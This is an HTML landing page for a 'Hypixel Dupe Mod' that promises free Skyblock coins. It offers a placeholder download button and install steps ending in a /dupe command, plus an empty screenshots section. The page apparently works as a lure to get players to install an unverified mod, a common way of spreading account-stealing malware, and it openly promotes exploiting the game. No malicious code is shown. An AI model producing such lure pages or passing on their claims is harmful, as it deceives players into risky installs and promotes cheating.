<!DOCTYPE HTML>

<html>
<head>
    <title>Hypixel Dupe Mod</title>
    <meta charset="utf-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
    <link rel="stylesheet" href="static/assets/css/main.css"/>
    <noscript>
        <link rel="stylesheet" href="static/assets/css/noscript.css"/>
    </noscript>
</head>
<body class="is-preload">

<div id="wrapper">
    <header id="header">
        <h1>Hypixel Dupe Mod</h1>
        <p>Get coins quick and for free!</p>
    </header>

    <div id="main">
        <section id="content" class="main">
            <section>
                <a href="#" class="button primary fit">Download Here</a>
                <hr/>

                <h2>How do I use the mod?</h2>
                <ol>
                    <li>Click on the download button and download the mod</li>
                    <li>Move the file to your forge mods folder</li>
                    <li>Run the game and join Hypixel Skyblock</li>
                    <li>Look for a lobby that is too laggy to trade in</li>
                    <li>Run /dupe with the item in your hand to dupe it</li>
                </ol>
                <p>Remember to not go overboard! Don't get this method patched!</p>
                <hr/>

                <h2>Screenshots from our users!</h2>

            </section>
        </section>
    </div>

    <footer id="footer">
    </footer>
</div>

<script src="static/assets/js/jquery.min.js"></script>
<script src="static/assets/js/jquery.scrollex.min.js"></script>
<script src="static/assets/js/jquery.scrolly.min.js"></script>
<script src="static/assets/js/browser.min.js"></script>
<script src="static/assets/js/breakpoints.min.js"></script>
<script src="static/assets/js/util.js"></script>
<script src="static/assets/js/main.js"></script>

</body>
</html>